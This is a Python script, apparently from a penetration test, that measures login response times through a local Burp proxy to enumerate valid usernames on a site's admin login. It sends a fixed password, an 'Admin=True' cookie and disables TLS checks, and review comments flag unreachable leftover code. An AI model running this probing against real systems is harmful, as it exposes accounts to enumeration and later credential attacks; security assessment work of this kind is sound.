#!/usr/bin/env python3
# import logging
import re
import requests
# logging.basicConfig(
# # filename='example.log',
# level=logging.INFO,
# format='(%(threadName)-10s)-%(levelname)s: %(message)s',
# )
def print_error(msg):
    """Print *msg* on stdout behind a bold red ``[-]`` tag."""
    tag = "\033[1m\033[31m[-]\033[0m"
    print(f"{tag} {msg}")
def print_status(msg):
    """Print *msg* on stdout behind a bold blue ``[*]`` tag."""
    tag = "\033[1m\033[34m[*]\033[0m"
    print(f"{tag} {msg}")
def print_good(msg):
    """Print *msg* on stdout behind a bold green ``[+]`` tag."""
    tag = "\033[1m\033[32m[+]\033[0m"
    print(f"{tag} {msg}")
def print_warn(msg):
    """Print *msg* on stdout behind a bold yellow ``[!]`` tag."""
    tag = "\033[1m\033[33m[!]\033[0m"
    print(f"{tag} {msg}")
def test_username(username: str) -> float:
    ''' Take a username as argument and return the response time to be compared.

    Performs two POSTs through a proxy on localhost:8080 (labelled "burp"):
    one to fetch a StateContext token from the login page, one to submit the
    login form with the given username and a fixed password. Returns the
    elapsed time of the second request in seconds.

    Raises:
        AttributeError: if no <StateContext> element is found in the login
            page, since ``re.Pattern.search`` returns None in that case.
        requests.RequestException: on connection/proxy failures (not caught
            here).

    NOTE(review): both requests pass ``verify=False``, which disables TLS
    certificate validation for the session; that is what lets the traffic be
    intercepted by the local proxy, but it also means the script will accept
    any certificate on the target. ``site`` and the ``Referer`` header are
    hard-coded to www.client.com, as are the password and an ``Admin=True``
    cookie.
    '''
    # Route both schemes through the local intercepting proxy.
    burp = {
        'http': 'http://localhost:8080/',
        'https': 'http://localhost:8080/',
    }
    s = requests.Session()
    s.proxies = burp
    site = 'https://www.client.com/'
    userAgent = 'Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/71.0.3569.0 Safari/537.36 autochrome/grey'
    # Get StateContext
    urlState = site + 'admin/login.aspx'
    headers = {
        'User-Agent': userAgent
    }
    # verify=False: certificate checks are off for this request (see docstring).
    reply = s.post(urlState, data={}, verify=False, headers=headers)
    # Extracts the first <StateContext>...</StateContext> value; raises
    # AttributeError when the element is absent because search() returns None.
    stateContext = re.compile('<StateContext>([^<]*)</StateContext>').search(reply.text).group(1)
    # Test authentication
    urlAuth = site + 'p/u/doAuthentication.do'
    # NOTE(review): 'User-Agent' appears twice in this literal; Python keeps the
    # last value, which here is the same string as ``userAgent``.
    headers = {
        'User-Agent': userAgent,
        'Accept': 'application/xml, text/xml, */*; q=0.01',
        'X-Requested-With': 'XMLHttpRequest',
        'User-Agent': 'Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/71.0.3569.0 Safari/537.36 autochrome/grey',
        'Referer': 'https://www.client.com/admin/',
        'Accept-Encoding': 'gzip, deflate',
        'Accept-Language': 'fr-FR,fr;q=0.9,en-US;q=0.8,en;q=0.7',
        'Cookie': 'Admin=True',
    }
    # Fixed password: the script only measures timing, it never expects to log in.
    dataAuth = {
        'login': username,
        'passwd': 'Pa$$w0rd',
        'savecredentials': 'false',
        'StateContext': stateContext
    }
    reply = s.post(urlAuth, data=dataAuth, verify=False, headers=headers)
    # Server-side processing time as seen by the client, in seconds.
    return reply.elapsed.total_seconds()
    # NOTE(review): everything below is unreachable (it follows the return) and
    # refers to ``res``, which is never defined in this function; if it were
    # ever reached it would raise NameError. Looks like a leftover from an
    # earlier message-based check rather than live code.
    print(res)
    if re.search('An account registered to this email address already exists.', res):
        print('{} is an already registered account.'.format(username))
    else:
        print('{} does not exist.'.format(username))
    return 8
def main():
    """Average the login response time of three fixed usernames over 100 calls each.

    For every username, ``test_username`` is called ``rounds`` times, the
    returned durations are summed in order, and the mean is printed.
    """
    rounds = 100
    probes = ('testsecu', 'testsecur', 'testsecuri')
    for user in probes:
        # Accumulate sequentially so float rounding matches a plain running sum.
        total = 0
        for _ in range(rounds):
            total += test_username(user)
        mean = total / rounds
        print(f'{rounds} tests of "{user}" took {mean} seconds in average.')


if __name__ == '__main__':
    main()